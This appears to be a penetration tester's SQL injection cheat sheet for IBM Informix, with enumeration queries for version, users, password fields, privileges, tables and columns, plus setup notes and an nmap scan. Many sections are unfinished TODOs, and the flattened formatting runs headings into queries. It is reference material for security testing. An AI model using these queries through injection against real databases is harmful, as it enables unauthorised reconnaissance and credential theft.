Hacking - SQL Injection Cheat Sheet (Informix)

SELECT DBINFO('version', 'full') FROM systables WHERE tabid = 1;
SELECT DBINFO('version', 'server-type') FROM systables WHERE tabid = 1;
SELECT DBINFO('version', 'major'), DBINFO('version', 'minor'), DBINFO('version', 'level') FROM systables WHERE tabid = 1;
SELECT DBINFO('version', 'os') FROM systables WHERE tabid = 1; -- T=Windows, U=32 bit app on 32-bit Unix, H=32-bit app running on 64-bit Unix, F=64-bit app running on 64-bit unix
Commentsselect 1 FROM systables WHERE tabid = 1; – comment
Current User
SELECT USER FROM systables WHERE tabid = 1;
select CURRENT_ROLE FROM systables WHERE tabid = 1;
List Usersselect username, usertype, password from sysusers;
List Password HashesTODO
List Privileges
select tabname, grantor, grantee, tabauth FROM systabauth join systables on systables.tabid = systabauth.tabid; -- which tables are accessible by which users
select procname, owner, grantor, grantee from sysprocauth join sysprocedures on sysprocauth.procid = sysprocedures.procid; -- which procedures are accessible by which users
List DBA AccountsTODO
Current DatabaseSELECT DBSERVERNAME FROM systables where tabid = 1; – server name
List Databasesselect name, owner from sysdatabases;
List Columnsselect tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid;
List Tablesselect tabname, owner FROM systables;
select tabname, viewtext FROM sysviews join systables on systables.tabid = sysviews.tabid;
List Stored Proceduresselect procname, owner FROM sysprocedures;
Find Tables From Column Nameselect tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid where colname like '%pass%';
Select Nth Rowselect first 1 tabid from (select first 10 tabid from systables order by tabid) as sq order by tabid desc; – selects the 10th row
Select Nth CharSELECT SUBSTRING('ABCD' FROM 3 FOR 1) FROM systables where tabid = 1; – returns 'C'
Bitwise AND
select bitand(6, 1) from systables where tabid = 1; -- returns 0
select bitand(6, 2) from systables where tabid = 1; -- returns 2
ASCII Value → CharTODO
Char → ASCII Valueselect ascii('A') from systables where tabid = 1;
select cast('123' as integer) from systables where tabid = 1;
select cast(1 as char) from systables where tabid = 1;
String Concatenation
SELECT 'A' || 'B' FROM systables where tabid = 1; -- returns 'AB'
SELECT concat('A', 'B') FROM systables where tabid = 1; -- returns 'AB'
String LengthSELECT tabname, length(tabname), char_length(tabname), octet_length(tabname) from systables;
If StatementTODO
Case Statementselect tabid, case when tabid>10 then “High” else 'Low' end from systables;
Avoiding QuotesTODO
Time DelayTODO
Make DNS RequestsTODO
Command ExecutionTODO
Local File AccessTODO
Hostname, IP AddressSELECT DBINFO('dbhostname') FROM systables WHERE tabid = 1; – hostname
Location of DB filesTODO
Default/System Databases
These are the system databases:

* = don't seem to contain anything / don't allow reading
Installing LocallyYou can download Informix Dynamic Server Express Edition 11.5 Trial for Linux and Windows.
Database Client
There's a [[https://www14.software.ibm.com/webapp/download/search.jsp?rs=ifxdl|database client SDK]] available, which might be of use.  I couldn't get the demo client working.
I used [[http://squirrel-sql.sourceforge.net/|SQuirreL SQL Client Version 2.6.8]] after installing the [[https://www14.software.ibm.com/webapp/download/search.jsp?go=y&rs=ifxjdbc|Informix JDBC drivers]] ("emerge dev-java/jdbc-informix" on Gentoo).
Logging in from command line
If you get local admin rights on a Windows box and have a GUI logon:

  -  Click: Start | All Programs | IBM Informix Dynamic Server 11.50 | someservername. This will give you a command prompt with various Environment variables set properly.
  -  Run dbaccess.exe from your command prompt. This will bring up a text-based GUI that allows you to browse databases.

The following were set on my test system. This may help if you get command line access, but can't get a GUI - you'll need to change "testservername":
set INFORMIXSERVER=testservername
set ONCONFIG=ONCONFIG.testservername
set PATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\bin;C:\WINDOWS\system32;C:\WINDOWS;
    C:\Program Files\IBM\Informix\Clien-SDK\bin;C:\Program Files\ibm\gsk7\bin;
    C:\Program Files\ibm\gsk7\lib
set CLASSPATH=C:\PROGRA~1\IBM\IBMINF~1\11.50\extend\krakatoa\krakatoa.jar;
set DBTEMP=C:\PROGRA~1\IBM\IBMINF~1\11.50\infxtmp
set DB_LOCALE=EN_US.8859-1
mode con codepage select=1252
Identifying on the network
My default installation listened on two TCP ports: 9088 and 9099. When I created a new "server name", this listened on 1526/TCP by default. Nmap 4.76 didn't identify these ports as Informix:
$ sudo nmap -sS -sV -p- -v --version-all
1526/tcp open pdap-np?
9088/tcp open unknown
9089/tcp open unknown
TODO How would we identify Informix listening on the network?

